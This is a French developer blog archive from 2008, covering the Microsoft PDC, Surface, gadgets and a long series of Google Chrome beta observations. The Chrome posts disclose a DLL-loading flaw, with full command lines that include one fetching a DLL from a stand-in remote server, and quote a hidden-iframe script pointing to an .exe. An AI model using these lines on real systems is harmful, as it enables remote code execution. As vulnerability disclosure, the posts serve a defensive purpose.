Bienvenue à Blogs CodeS-SourceS Identification | Inscription | Aide

Ca sonne comme une vielle rengaine techno et pourtant c'est bien le  lead motif de ce deuxième keynote à la PDC ! Microsoft est maintenant en possession de tout les blocs nécessaire pour bâtir des applications "on the web" de qualité équivalente (ou presque) à ce que l'on connais utilise déjà en local.

Sans titre

Tout est prêt : Les haut débit de l'internet, les services d'autentifications unifiés, les services d'abstraction et de communication multi-device, le moteur de rendu vectoriel, les dalles multi-touch , les inks, les infrastructures permettant de deployer, manager un nuage de serveur et répondre à la masse d'utilisateur en expansion constante et bien évidement Sylverlight !

Sans titre1

Bref mes collègues bloggeurs en parlont bien mieux que moi mais on comprend bien que tout les projets que Microsoft menais en parallèle convergent et forme un tout cohérent. Il reste toutefois encore beaucoup de travail pour rendre tout cela accessible.

 

 

Wahou ! Sortant tout juste de la session "Developing for Microsoft Surface" pour laquelle Azra nous a fait un beau resumé je ne suis pas époustoufler mais seulement content. Content de voir que la technologie avance, ce que l'on espérait voir sur le marché il y a au moins 2 ans arrive enfin ! 

Les devices multi-touch vont rapidement nous envahir, que ce soit dans les entreprises (hotel,  showroom, conference hall, supermarché) ou bien dans les lieux publiques (transport, administration, lieu de culte).

 Sans titre2

A l'image du film "Minority report", une nouvelle façon d'interagir avec la machine gagne nos habitudes. On touche, on frôle, on jette, on tape, on glisse, le corps tout entier devient interfaçable !

  Sans titre1

On comprend mieux pourquoi WPF, pourquoi Aero, pourquoi DirectX etc... La machine ne s'adresse plus seulement à notre logique mais à nos sens. Je me souvient des tout premier essaie de la réalité virtuelle, aujourd'hui ce n'est plus l'homme qui prend place dans le virtuel mais bien le virtuel qui prend place dans notre réalité. C'est une experience qu'il faut vivre pour prendre conscience de l'étendue des possibilités qui s'offre aux developpeurs et plus largement au utilisateurs.

 Sans titre

Bref après avoir passé le cumulonimbus du "cloud computing" je refais surface et vais changer le monde avec mon device à 15000 batons !

Comme vous pourrez le constater depuis le flux RSS chacun y va de son impression sur le Keynote et sur les annonces de la PDC.

En bon Vébistus-Neandertalus que je suis mes impressions se résument à la phase suivante :

blacksmoke

Moi : "Vous avez dit le smoke Computing ?"

Lui : "Non : Cloud computing ?"

Moi : "Ah,  c'est une sorte de nuage toxique pour client drogué ?"

Lui : "Non : c'est une autre façon de penser les infrastructures"

Moi : "Ah oui donc le concept de la 5eme génération d'application ce serait : Contrôlons les averses plutôt que de vendre des parapluies ?

Lui : "Non : c'est des outils, des protocoles de communication, de déploiement, mais surtout des services au profits de la productivité et de la rentabilité partout dans le monde."

Moi : "Whaouh... c'est toujours techniquement obscure mais j'imagine que cela ouvre de nouvelles perspectives"

 

Pour en savoir plus c'est par ici :

http://www.microsoft.com/azure/faq.mspx

http://www.microsoft.com/azure/default.mspx

Lors d'événement comme celui de la PDC on a toujours droit à une avalanche d'information musclées. Comment faire la part des choses, sortir les intox de l'info et prendre l'autoroute des fresh news dans le bon sens ? Pour vous guider voici quelques exemples : de vrais cas d'école repris, entre autre, dans les fiches révisions de la fac de Nanterre.

Sans titre1

 

 

 

 

<< La série South Park créée et écrite par Trey Parker et Matt Stone, malgré ce que l'on pourrais croire ne s'inspire pas d'une ville du colorado mais bien d'un quartier de Los Angeles ou a réellement vecu Kenny !

Déclaré mort une première fois des suites d'un accident de voiture mais aillant toutefois survécu, à finalement rendu l'âme au troisième redémarrage de son OS. La légende raconte qu'il mourut dans un effroyable cri : "Wooow" ! >>

 

 

/ ! \  INTOX  / ! \

 

 

 

   Sans titre2 

 

 

 

 

<< La porte des étoiles aussi appelé "Star Gate" n'a jamais été ronde et ne comporte aucun code de verrouillage ! Elle est en réalité carré et l'on accède au coordonnées spatiales via le menu "démarrer mon téléportage" (après avoir désactivé l'UAC évidement) >>

 

/ ! \  INTOX  / ! \

 

 

 

 

 

 

 

Sans titre3

 

 

<< Les ventes de Vista dépassent les limites du raisonnable, les revendeurs sont dans l'obligation matériel d'agrandir leurs rayon partout dans le pays !! >>

 

 

 / ! \  INTOX  / ! \

 

 

 

  

 

Sans titre5

 

 

<< Il y aura tellement de goodies à la PDC que les aéroport de Los Angeles prévoit le rapatriement des Developpeurs en A380 ! Enfin vu le retard pris par le constructeur européen on est pas prêt de rentrer au pays !! >>

 

  / ! \  INTOX  / ! \

 

Sans titre8

 

 

<< Le logo des MVP fait peau neuve ! Il sera plus proche de la vérité du monde du développement et comme vous pouvez le constater plus proche des développeurs ! Un tatouage sera offert à tout les participant du programme : sur le torse "MVP" et dans le dos au choix soit la technologie de l'expert soit le slogan : "Avec du SOAP, ça rocks !"  >>

 

 / ! \  INTOX  / ! \

 

  

 

Sans titre4

 

 

<< Kad et Olivier seront les personnages principaux de Far Cry 3 sur XBOX 360! Un cheat mode premettrait même de débloquer Dieudonné !! >>

 

 

 

 / ! \  INTOX  / ! \

 

 

 

 

Sans titre6

 

 

 

<< Windows 7 intégrera la technologie "Windows Flou Seven dot net" fusion de ClearType et Aero. Try The Flou Effect ! >>

 

 

/ ! \  INTOX  / ! \

BadgeSamples

<< A la PDC on fait comme dans Pokemon on doit attraper des developpeurs et gagner des badges !! Gotta catch 'em all  >>

 

( ? ) INFO  ( ? )

Oui, c'est vrai et l'on peut même créer son propre badge. Vous voulez en savoir plus c'est par ici :
http://microsoftpdc.com/Social/
http://microsoftpdc.com/Social/PDC08-Badge-Templates.zip

 

 

A bientôt,

 

Transporté par une tornade dans un monde féerique l'équipe CodeS-SourceS parcours le chemin de brique jaune à la recherche du Magicien d'Oz(zie) ! Bon ok on a pas encore rencontré l'épouventail qui parle, l'homme métallique et le lion peureux mais j'ai bon espoir.

Sans titre

pdc_2 
Comme vous pouvez le constater nous avons déjà trouvé un indice pour nous mener à la méchante sorcière de l'Est qui devrait faire son apparition aux registrations de dimanche.

En tout cas on a déjà le cerveau pour l'homme métallique manque plus que des licences de Windows Seven pour Dorothy vous savez : "Windows Vista en mieux" !

D'ailleurs il semblerait que le Seven aura la part belle durant cette convention du moins pour ce qu'on en a vu : http://blogs.codes-sources.com/nix/archive/2008/10/25/pdc-on-a-visit-pour-vous.aspx

 

 

 

Enfin si c'est ça... on a tout vu :p

La PDC c'est quoi et c'est ou ?

La PDC est "LA" conférence Microsoft pour les Développeurs professionnels. Elle se deroulera du 26 au 30 octobre 2008 à Los Angeles et depuis le site Web http://www.microsoftpdc.com/. Retrouvez également les tout les avis et retour de cet evenement sur http://pdc.codes-sources.com/. Si j'en crois tout ce que l'on ma déjà dit, ça devrait être bouger encore plus qu'un verre de jus d'orange de 767 en phase de turbulence.

A bientôt

Bonjour à tous,

"
C'est l'histoire d'un mec qui vois sur le net que Google sort son navigateur.
Totallement sécurisé en lisant la bande dessiné il telecharge l'installateur.
Au bout d'un minute il se dit "zut il y a une enorme faille dans ce browseur".
C'est pourquoi pour être sympa il decide d'en parler sur son blog.
Il se dit "c'est nouveau, c'est tout beau ils vont arranger ça et lire les logs".

Le temps passe, les proof of concept aussi.
Oh ça affiche un 'ti message c'est mimi !
Mais nul ne prend garde au code caché.
de plus ils semblent decidé à ne rien changer !

Bref encore une mise jour qui fait plaisir aux marketeux.
Installez donc la v0.2.149.30 vous serez heureux,
de constater tout comme moi,
Qu'ils n'ont toujours pas bougé le petit doigt.
"

Bon les puristes excuseront les quelques atteintes aux regles de la poesie mais il fallait bien apporter de la nouveauté pour vous dire que la v0.2.149.30 de chrome disponible ici : http://www.google.com/chrome ne corrige toujours pas ce que j'ose encore appeler "Ze faille feature !" ou encore "Ze bad firefox plugin implementation" traduit du texte googléien antique "onavaitpasenviedesefairech*utf8*".

Je vais pas tout vous raconter depuis le début mais pour ceux que ça interresse, suivez les liens ci-dessous :

du 2 Septembre : http://blogs.codes-sources.com/ebartsoft/archive/2008/09/02/google-chrome-j-adopte.aspx
du 3 Septembre : http://blogs.codes-sources.com/ebartsoft/archive/2008/09/03/google-chrome-faille-de-s-curit.aspx
du 9 Septembre : http://blogs.codes-sources.com/ebartsoft/archive/2008/09/09/faille-google-chrome-on-prend-la-m-me-et-on-recomence.aspx

Bon on a tous le droit à l'erreur, quelque part c'est humain. Pour ma part j'ai dis que j'adoptai... (haha drole) mais c'est pas totalement faux j'ai toujours Chrome ! Maiiiis non pas comme navigateur evidament (faut pas déconner). Je m'en sert comme base de test pour mes dll c'est plus rapide que de faire un projet template sous visual studio.

Aller, à la prochaine (release)

Le 8 septembre Google presentait une mise à jour de chrome en version 0.2.149.29 : http://googlechromereleases.blogspot.com/2008/09/beta-release-0214929.html

Cette version corrige des "failles", je vous laisse le soin d'en decouvrir plus...

Neanmoins je persiste et continue de denoncer le trou de sécurité béant laissé par la gestion des plugins douteuse qui autorise l'execution de code depuis internet. Je ne vous ferai pas de demo ou de "proof of concept" depuis une page web soigneusement redigée : manquerai plus qu'on leur mache le travail.

Toutefois et compte tenu de la simplicité de ce que j'appelerai naivement "la faille" je vous copie/colle l'unique ligne de commande à tester chez vous pour le fun :

"c:\users\{username}\appdata\local\google\chrome\application\chrome.exe" --type=plugin --channel=0000.0000000.000000000 --plugin-path="ici_la_dll_qui_tue.dll"

Ou bien la version unc path qui, il faut le dire sinon personne ne s'en rend compte, telecharge la dll depuis l'internet :

"c:\users\{username}\appdata\local\google\chrome\application\chrome.exe" --type=plugin --channel=0000.0000000.000000000 --plugin-path="\\ici_le_serveur.com\ici_la_dll_qui_tue.dll"

Ce n'est pas à vous qui me lisez que je vais apprendre qu'il est possible en y additionnant quelques lignes de script d'executer ce shell depuis le navigateur.

Alors... rendez-vous à la prochaine mise à jour de notre IE/FF killer préféré !

Je l'attendai avec impatience le voici enfin :

le Dell Inspiron Mini 9

Dimensions : 22,5x16,7x3cm
Microprocesseur : Intel® Atom Processor® N270 (1.6GHz/533Mhz FSB/512K cache)
Ecran : 8.9 pouces LED - resolution max : 1024X600
Carte graphique : Intel Graphics Media Accelerator (GMA) 950
Capacité de stockage : 4GB (la faut l'option...)
Memoire : 512MB DDR2 at 533MHz (l'option est la bienvenue...)
Features : Wifi 802.11g integré, 2 Ports USB, Sortie VGA, Ethernet, Casque et Micro jack, Lecteur de carte 3 en 1
Batterie : 32WHr 4 cellule (euh... ouai ça nous donne pas l'autonomie)

Options : Capacité 16Gb, Bluetooth 2.1, Webcam 1.3M Pixel, 1GB DDR2 - 533MHz

Disponible en trois configurations, deux couleurs, materiel sans surprise à un prix que je trouve plutôt elevé comparé à ses concurrents Asus et Acer. Il est, comme toujours chez Dell, possible de choisir la configuration qui vous va le mieux soit 494$ avec la web cam, 1G de ram et le disque de 16Gigs. J'aime beaucoup le look enfin un mini pc qui ressemble à quelque chose.

Ces mini pc sont de plus en plus attractifs, je vais surement franchir le pas.

Et vous quel est votre mini pc ?

 

En Beta Testant mon Google chrome je me suis apperçu qu'il etait possible de charger n'importe quelle dll dans le process de Chrome avec un simple shellexecute :

Shell "c:\users\xxxxx\appdata\local\google\chrome\application\chrome.exe --lang=fr --type=plugin --channel=3968.2993070.1103732645 --plugin-path=""c:\mondossier\madll.dll"""

Le numero de channel peut être recuperé en listant les processus de chrome !

La dll se charge et dllmain est executé, juste apres chrome se coupe mais il est trop tard le mal est fait...

Aller encore un petit effort c'etait presque bien, vous nous refaite une petite page de BD ? ;)

Explication :

"Il serait possible d'executer du code de provenance inconnu dans le processus de Google Chrome."

Le processus chrome.exe apparaitrait alors normallement dans la liste des taches sans erreur notoire. Neanmoins un code malveillant pourrait telecharger, executer, espionner et bien d'autres choses à travers Chrome.exe.
Ceci grace à l'argument de ligne de commande --plugin-path qui permet de charger une DLL (fichier binaire contenant du code) au sein de Chrome.exe visiblement sans verification de sa provenance.
Meme si le processus a des droits limité sur le systeme cette DLL beneficie d'une excelente couverture.

 

Et oui, mes premiers tests etant plus que concluant j'adopte ! on verra à l'usage.

Je suis pour le moment completement emballé par la rapidité et l'intuitivité de l'interface, les onglets detachable, l'integration du moteur de recherche etc...

Manque encore quelques features comme la possibilite de fermer les onglets selectionnés mais... ça viendra !

Pour le télécharger c'est ici : http://www.google.com/chrome


Remarques du Mardi 2 Septembre 2008 :

Remarque 1 : Impossible de le passer a l'acid 3, etrangement le site ne repond pas ?!? dommage ça attendra :p.
Remarque 2 : Vraiment intrusif, le systeme d'historique va tres loin, il est d'ailleur impossible de supprimer certains elements.
Remarque 4 : Bug d'affichage sur les combobox, le contenu est tout noir.
Remarque 5 : Tiens... le lecteur flash fonctionne sans avoir ete installé ? Chrome utiliserait il les activex ?!? (reponse : non, voir rem 10)Remarque 6 : On dirais que l'historique se base sur l'ip et les recherche google... ?!?
Remarque 7 : Chrome gere les favoris d'IE et FireFox.
Remarque 8 : http://www.microsoft.com/protect/default.mspx ne passe pas tres bien surement un probleme de gestion des CSS (anecdote : la petite icone live search est invisible).
Remarque 9 : Chrome n'aime pas tout les RSS ex : http://emploi.codes-sources.com/rss.ashx?type=offre_emploi affiche que les données du dataset en texte brute.
Remarque 10 : J'ai ma reponse pour flash Chrome utilise les plugin de FireFox (ligne de commande :"chrome.exe --plugin-path="c:\program files\mozilla firefox\plugin\npswf32.dll")
Remarque 11 : Les process séparé c'est bien mais on se retrouve rapidement avec "30 process chrome" et "100% de cpu" meme sur un dual core.
Remarque 12 : Il est visiblement impossible de replacer un onglet dans une barre lorsqu'ils ont ete separé. (note : Cyril viens de m'ecrire que c'etait possible voir en commentaire, parfait :p)
Remarque 13 : A bah sylverlight ça passe pas... (joke)
(Pensé immédiate) : ..."Google Chrome" copyrighté depuis 2006, deux ans apres le Waibe 2.0 de tim O'Reilly"...
Remarque 14 : Les telechargement de fichier ce font sur le bureau par un simple clique, c'est trop discret et surtout sans confirmation !
Remarque 15 : Chrome n'aime pas la FreeTextBox http://freetextbox.com/demos/
Remarque 16 : Chrome et ExtJs ça passe ! http://extjs.com/deploy/dev/examples/desktop/desktop.html
Remarque 17 : J'aime le petit messge qui dis "Aie Aie Aie, une erreur s'est produite lors de l'affichage de la page web" avec un petit dossier qui fait la tronche (suffit de killer l'onglet a partir du manager de process pour l'obtenir). D'ailleur tentez de faire "enregistrer la page sous..." pour avoir une petite icone qui tourne en boucle infini : "telechargement de 0/0 fichier"
Remarque 18 : Chrome et "Live Hotmail" ça marche ! hormis la TextBox qui semble avoir le même probleme que la FreeTextBox ! ;)
Remarque 19 : Les grandes images s'affiche "visiblement" de bas en haut même si elle sont entrelacé !
Remarque 20 : Tiens quelqu'un peu me filer le fichier de deboggage svp : "C:\b\slave\chrome-official\build\src\chrome\Release\chrome_exe.pdb" ça sent le visual Studio a plein nez !
Remarque 21 : Tiens (n°2)... Chrome utilise les lib c de Dinkumware Ltd, interressant !
Remarque 22 : Que viens faire un copyright IBM dans chrome.exe "Copyright (C) 2007, International Business Machines Corporation and others" ?!? (J'ai trouvé c'est en partie le support unicode/scribe)
Remarque 23 : Ah ben je savais bien qu'on compile avec Visual Studio Chez Google ! "Microsoft Visual C++ Runtime Library" ;)
Remarque 24 : Tiens (n°3) Chrome.exe exporte une API "DumpProcess" !!
Remarque 25 : Tout les png de l'interface se trouve dans C:\Users\XXXX\AppData\Local\Google\Chrome\Application\0.2.149.27\Themes\Default.dll avec un petit coup de ResHacker on change l'IU de son Chrome ! C'est cool j'ai un chrome Rouge ;p
Remarque 26 : gears.dll contient toutes les ressources html, css, js et image des boites de dialogue in process... Quelle serait l'influence d'un eventuel changement de ses données via un editeur de resource ?!?
Remarque 27 : "Google Chrome ne prend pas en charge Windows 2000" ce n'est pas moi c'est fr.dll qui le dit ;)
Remarque 28 : "Voulez-vous vraiment désinstaller Google Chrome ? (Avons-nous dit quelque chose qui vous a déplu ?)" de l'humour chez Googlé ;)
Remarque 29 : Deux URL etrange : http://web-bug.appspot.com/bugreporthttp://fix.me.please/?url=x
Remarque 30 : Any comment sur "D:\pulse\recipes\212112229\base\googleclient\shared\financial_tracking\rlz\build\opt\obj\dll\rlz_dll.pdb" ?!?
Remarque 31 : C'est déjà pas mal pour aujourd'hui non ? Alors à la prochaine

Remarques du Mercredi 3 Septembre 2008 :

Remarque 32 : ...

              

Remarque 33 : ET LES SOURCES DANS TOUT CA, ELLES SONT OU ? ( un gars dans le fond qu cri : "d.... t... c.. !!!" )
Remarque 34 : Les images de l'interface (png) on été realisé avec "Adobe ImageReady"
Remarque 35 : Possible faille de securite par simple ligne de commande shell voir :
http://blogs.codes-sources.com/ebartsoft/archive/2008/09/03/google-chrome-faille-de-s-curit.aspx
Remarque 36 : Pour avoir des info sur chrome regardez FireFox : "C:\Program Files\Mozilla Firefox\chrome\chromelist.txt" Rien a voir.
Remarque 37 : Une faille "Chargement de dll sans controle" : http://blogs.codes-sources.com/ebartsoft/archive/2008/09/03/google-chrome-faille-de-s-curit.aspx
Remarque 38 : Une autre faille (bug) "arret du process" : http://evilfingers.com/advisory/google_chrome_poc.php
tapez evil:% dans la barre d'adresse et boom.
Remarque 39 : Manque le "clique sur la molette puis scroll"
Remarque 40 : Encore une faille permetant d'executer un programme si la page web contient du code comme suis :
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

Remarque du samedi 13 Septembre :

Remarque 41 : les about what a taper dans la barre d'adresse :
- about:internets : lance l'écran de veille de Windows XP. Sous Vista on a seulement le titre "the tubes are clogged" (les tuyaux sont bouchés).
- about:cache : liste les fichiers mis en cache.
- about:crash : affiche l'écran affiché en cas de plantage de Chrome.
- about:dns : quelques statistiques sur les résolutions DNS.
- about:histograms : quelques statistiques sur l'exécution de commandes par Chrome.
- about:memory : compte-rendu de la mémoire utilisée par Chrome et tous les autres navigateurs ouverts.
- about:network : outil à la httpwatch pour voir les telechargement de fichiers.
- about:plugins : liste détaillée des plugins (pompé sur firefox) installés sur Chrome.
- about:stats : quelques statistiques sur Google Chrome.
- about:version : affiche la version de Google Chrome, son nom d'agent, l'auteur et les éventuels droits réservés.

 

'' A chaque Geek sa page de démarrage !

La votre est terne ? Misérable ? Dénué de contenu dynamique ? Envie de changer ?

 

Faites donc connaissance avec http://start.codes-sources.com/
, la page de démarrage du réseau CodeS-SourceS. ''

 

En quelques secondes je retrouves des flux intéressants, le moteur de recherche et l'ambiance de CodeS-SourceS
depuis n'importe quel ordinateur connecté au web.

img1

 

Mais je suis limité, je peux pas ajouter mes Rss perso. J'ai la solution... Je me connecte via le lien
en haut de page. J'entre mes identifiants, ceux que j'utilise tout les jours sur CodeS-SourceS :

 img2

 

Et la... j'ai la fonctionnalité que je voulais. Je clique sur 'ajouter du contenu', le panel apparaît.
Je tape le lien vers le flux rss, un titre pas trop deconnant et je valide. Une boite apparaît ou
une injure box selon le validité du flux. Me reste plus qu'a drag-droppé ou bon me semble parmi les
3 colonnes disponibles :

 img3

 

Comme toute bonne page de démarrage qui se respecte j'ai le moteur de recherche à porté de main.
Au choix : le moteur de Google (mouai... classique) ou bien le moteur de CodeS-SourceS
(qui trouve sur le web et dans mon réseau préféré) :

 img4

 

Pour ajouter http://Start.CodeS-SourceS.com/ en page de démarrage d'Internet Explorer
il me suffit de cliquer sur le lien correspondant en haut à droite de la page :

img5

 

Les utilisateurs de FireFox ne sont pas en reste, pour ajouter Start.CodeS-SourceS.com
en page de démarrage je clique sur outil->options>page d'acceuil comme sur la capture
ci-dessous :

 img6

 

Bon alors si je vous ai pas convaincu avec ma demo je vous donne 3 bonnes raisons de
mettre http://start.codes-sources.com/ en page de démarrage :

 

1 - Tout les fonds seront reversés à la sauvegarde des baleines de l'Oise (quels fonds ? quelles Baleines ? )

2 - Par ce que http://start.codes-sources.com/ c'est rapide, pratique, simple, sympa, utile, le paradis du l'internaute

3 - Et surtout par ce que c'est un peu moi qui l'ai fait ! Bonne raison non ?

 

Plus sérieusement : faites-y un tour, testez, cliquez partout et dites moi ce que vous en pensez...

 

Si comme moi vous trouvez que Firefox (v2) est lent quand vous developpez en local et bien figurez vous que c'est normal !

Il y a t'il une solution ? oui la voici :

  1. Demarrez Firefox
  2. Tapez : about:config (dans la barre d'adresse)
  3. Tapez : network.dns.disableIPv6 (dans la barre "filtre")
  4. Dans la liste devrait figurer : "network.dns.disableIPv6" double cliquez dessus pour le passer à "true"
  5. Fermez Firefox et enjoy !!!

Source : http://www.superwasp.net/weblog/2007/08/fix-firefox-slow-response-for-localhost.htm
Aussi sur le blog de Cyril : http://blogs.developpeur.org/cyril/archive/2007/06/19/probleme-de-lenteur-avec-firefox-et-vista-en-localhost.aspx

A bientôt

Imaginez un monde merveilleux ou les étudiants
passeraient leurs épreuves de bac sur la balance :

Elle : "Salut David alors t'as perdu combien ?"
Lui : "Ben… 10 kilos je vais avoir la moyenne !"
Elle : "A cool, j'ai perdu une cote et un bras je vais avoir la mention bien"

Ok j'exagère un peu mais figurez vous que Docteur Pierre Dukan, inventeur du régime Dukan nous a trouvé une chouette idée bien avant-gardiste (moi je dirais plutôt farfelue) pour agrémenter le bac : "L'option poids d'équilibre : Stabiliser son poids pour gagner des points au baccalauréat".

Vous ne rêvez pas ! Nos étudiants seront bientôt jugés sur leur physique, puisque c'est de cela qu'il s’agit. Le docteur Dukan a proposé son projet aux ministères de l'Education nationale et de la Santé sous couvert d'une pseudo-sauvegarde de la santé et profitant du fait que le jeune est à un âge ou il se construit. Concrètement, le(la) lycéen(ne) gagnera les points de l'option de poids d'équilibre s'il réussit à stabiliser pendant les 2 années pré-baccalauréat (1ère et terminale) son indice de masse corporelle (IMC) entre 18 et 25.

Bref personnellement assez sensible à la question du poids je trouve cela scandaleux. Peut être que d'autre y verront un nouvel avenir...

Et pourquoi pas le permis de conduire sur la balance ? Ou le super marché restreint pour les "gros" ? Ou le Framework (dot) Fat ou que sais-je, moultes dérivés du concept...

A bientôt

 

Sources : Google

 Aujourd'hui c'est l'anniversaire de Nix ! yeah !

 Petit message perso :

 "Je te souhaite un très bon anniversaire et plein de reussites dans tout ce que tu fais !"

 à bientôt

 

 

 

 

 

 

 

 

Je passe vite fait pour craner et vous annoncer que j'ai été renouvelé au titre de Microsoft - Most Valuable Professionals - Visual Basic pour l'année 2008, plutôt cool !

En voila une bonne nouvelle et en plus c'est pas un poisson d'avril, enfin j'espere... j'ai pas verifié les adresse email... arf.. la pression... haha.

Sur ce j'm'en va' coller des carpes dans le dos de mes petis collegues.

A bientôt

 

 

Note à moi même : "Vérifier l'autenticité des adresses email non signées dans les messages emanent d'une autorité niania ... systeme non dédié...    bla   bla...         à la sécurité de la...           base      de  ..."

Bonjour,

Mon premier article "programmation" de l'année ça se fête non ? Alors si le titre de l'article vous parle ou bien si vous êtes un peu curieux filez lire la suite ici (voir http://ebartcodes.info/articles/vb5cce/) sinon passez votre chemin.

A bientôt. Smile

Je sais pas pourquoi... mais ça me fait marrer !

Vu sur http://blog.zanorg.com/

"A l'occasion de la signature d'un accord de partenariat entre Sciences Po et Microsoft, Steve Ballmer, CEO de Microsoft a donné une conférence aux étudiants de l’école."

C'est dingue, quand j'étais en cours nos interfenants était plutôt du genre de la gendarmerie national ou de l'armée de terre hahah. Big Smile

"Voici une vidéo en exclusivité ! Microsoft ne rendra pas accessible cette vidéo sur son site web avant mardi matin prochain.

http://download.microsoft.com/download/3/3/1/331886c1-e277-41ab-98cb-054b0bb81eb6/Rencontre_avec_les_etudiants_de_Science_Po_453_Kbits.wmv"

Les temps changent... mais les classes restent Big Smile

 

Souhaitons tous un joyeux anniversaire à Patrice L. alias PatriveVB qui fête aujourd'hui son néniéme anniversaire (Et oui à son age on ne devoile plus les chiffres) avec toujours la même soif de connaissance et de partage !

Youhouuuu bon anniversaire !!!

Big Smile 



Les 10 derniers blogs postés

- Nouveau blog en anglais / New blog in english ! par Le blog de Patrick [MVP SharePoint] le 09-18-2014, 18:42

- [ #Yammer ] From Mailbox to Yammer and back / De votre messagerie vers Yammer et retour ! par Le blog de Patrick [MVP SharePoint] le 09-15-2014, 11:31

- [ #Office 365 ] New service settings panel / Nouveau panneau de paramétrage des services par Le blog de Patrick [MVP SharePoint] le 09-11-2014, 08:50

- Problème de déploiement pour une démo SharePoint/TFS? par Blog de Jérémy Jeanson le 09-10-2014, 21:52

- [ #Office365 ] Delve first impressions / Premières impressions sur Delve par Le blog de Patrick [MVP SharePoint] le 09-09-2014, 16:57

- [ #Office365 ] How to change Administration console language ? / Comment changer la langue de la console d’administration ? par Le blog de Patrick [MVP SharePoint] le 09-09-2014, 08:25

- [ #SharePoint 2013 ] Suppression de bases de données en état “Pas de Réponse” par Le blog de Patrick [MVP SharePoint] le 09-04-2014, 14:10

- Changer l’adresse d’une ferme Office Web Apps associée à SharePoint par Blog de Jérémy Jeanson le 09-01-2014, 22:21

- Une ferme #SharePoint 2013 dans @Azure en quelques clics (1ère partie) ! par Le blog de Patrick [MVP SharePoint] le 08-28-2014, 18:52

- SharePoint 2013: Préparation de la migration - Création des site Templates dans 2010 et 2013 par Blog Technique de Romelard Fabrice le 08-20-2014, 16:31